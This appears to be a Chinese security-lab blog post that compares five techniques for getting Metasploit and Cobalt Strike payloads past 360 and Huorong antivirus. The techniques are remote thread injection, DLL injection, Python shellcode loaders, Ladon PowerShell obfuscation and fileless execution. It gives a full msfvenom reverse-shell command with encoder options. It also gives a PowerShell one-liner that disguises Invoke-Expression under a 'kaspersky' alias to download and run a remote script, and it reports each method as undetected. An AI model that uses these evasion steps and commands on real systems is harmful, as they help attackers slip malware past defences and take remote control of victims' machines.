五种免杀bypass火绒360姿势横向测评:哪款更适合你?

文章来源|MS08067 安全实验室

一、远程线程注入

(一)通过MSF生成payload

通过msfvenom生成payload,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.103 lport=4444 -e x86/shikata_ga_nai -i 5 -f c -o ./Desktop/1.c

(二)通过远程线程注入加载payload

通过VS2019对payload进行处理:

编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试。

(三)检测免杀

在Kali上开启msf监听

在靶机上运行Project1.exe,Kali机器获取到Session,并且360和火绒均未报毒

二、DLL注入

(一)通过DLL注入加载Payload

通过VS2019编译DLL文件,该DLL文件将加载之前用MSF产生的payload,经regsvr32测试可以使用

再通过VS2019编译DLL加载器,该加载器将会把指定DLL(Dll1.dll)加载到指定进程

(二)检测免杀

在Kali机器上开启msf监听

开启calc.exe,获取其PID信息

运行Project1.exe,Kali机器获取到Session,且火绒和360未报毒

三、Shellcode加载器

(一)python运行加载器

将python脚本中的shellcode部分改为msf生成的payload

(二)检测免杀

Kali机器开启监听

在Windows学员机环境下运行python加载器,kali获取到session,且360和火绒均未报毒,第一次失败是由于配置shellcode时多打了一个字符导致出错。

四、Ladon免杀(Powershell混淆)

(一)通过CS生成powershell的payload

当直接使用powershell运行,则会被火绒查杀

(二)通过Ladon进行代码混淆

使用Ladon对Powershell代码进行混淆

(三)检测免杀

运行powershell脚本,发现CS成功上线,且没有被火绒和360告警

五、无文件落地免杀

(一)在Kali机器上部署恶意powershell脚本

(二)Windows机器远程获取执行,使用命令远程获取脚本执行

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://192.168.61.103/1.txt')

(三)检测免杀

CS成功上线且火绒和360均未报警

个人成就
Ms08067安全实验室
文章
8
阅读量
36175
获赞
8003
作者排名
469